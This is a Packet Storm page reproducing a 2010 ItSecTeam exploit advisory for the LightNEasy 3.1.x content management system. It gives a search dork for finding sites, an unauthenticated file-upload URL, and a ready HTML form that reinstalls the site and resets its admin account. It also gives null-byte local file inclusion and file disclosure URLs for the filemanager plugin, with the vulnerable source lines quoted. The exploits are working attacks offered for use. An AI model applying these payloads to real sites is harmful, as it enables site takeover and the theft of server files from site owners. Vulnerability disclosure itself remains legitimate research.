what you don't know can hurt you

LightNEasy 3.1.x File Upload / Disclosure / Local File Inclusion

LightNEasy 3.1.x File Upload / Disclosure / Local File Inclusion
Posted Apr 22, 2010
Authored by ItSecTeam

LightNEasy version 3.1.x suffers from file disclosure, local file inclusion, software installation and file upload vulnerabilities.

tags | exploit, local, vulnerability, file inclusion, info disclosure, file upload
MD5 | 9dfca56ec89dbb6595f31d6e58116f03

LightNEasy 3.1.x File Upload / Disclosure / Local File Inclusion

Change Mirror Download
##############################################################################
#Title: LightNEasy 3.1.x Multiple Vulnerabilites #
#Vendor: http://lightneasy.org/ #
#Dork: "Powered by LightNEasy" #
##############################################################################
#AUTHOR: ITSecTeam #
#Email: Bug@ITSecTeam.com #
#Website: http://www.itsecteam.com #
#Forum : http://forum.ITSecTeam.com #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability46.htm #
#Thanks: r3dm0v3 [r3dm0v3_at_ymail.com] #
##############################################################################

#DESCRIPTION (by vendor):#####################################################
LightNEasy, a simple and light Content Management System and Website Builder


#1-fckeditor Remote File Upload###############################################
#Desc:
Remote users can upload file without authentication.

#POC:
http://site.com/fckeditor/editor/filemanager/connectors/test.html


#2-Reinstallation#############################################################
#Desc:
After software installation it is still possible for remote users to reinstall
the software without authentication.

#Exploit:
<html>
<form name="form1" action="http://site.com/LightNEasy/install1.php" method="post"><table>
<tr><td>Enter password:</td><td><input type="password" name="password" value="" /></td></tr>
<tr><td>Repeat password:</td><td><input type="password" name="password1" value="" /></td></tr>
<tr><td>Admin name:</td><td><input type="text" name="admin" value="" /></td></tr>
<tr><td>Admin email:</td><td><input type="text" name="email" value="" /></td></tr>
<tr><td>Website email:</td><td><input type="text" name="wemail" value="" /></td></tr>
<tr><td>Tables prefix:</td><td><input type="text" name="prefix" value="LNE_" /></td></tr>
<tr><td>Database system:</td><td><select name="database" ><option value="SQLite2">SQLite 2 (following fields empty)</option><option value="SQLite3">SQLite 3 (following fields empty)</option><option value="MySQL">MySQL</option></select></td></tr>
<tr><td>Database name:</td><td><input type="text" name="databasename" value="" /></td></tr>
<tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
<tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
<tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
<tr><td>&nbsp;</td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
</table></form>
</html>


#3-Filemanager plugin Local File Inclusion####################################
#Bug-file: /plugins/filemanager/get_file.php
29: if(!isset($language)) $language = 'en';
30: include("languages/lang_$language.inc"); //<---- vulnerable line!

#Exploit:
http://site.com/plugins/filemanager/get_file.php?language=[file_to_include]%00


#4-Filemanager plugin Local File Disclosure###################################
#Bug-File:
14: if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
...
56: readfile($file);

#EXPLOIT:
http://site.com/plugins/filemanager/get_file.php?file=[file_to_read]

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close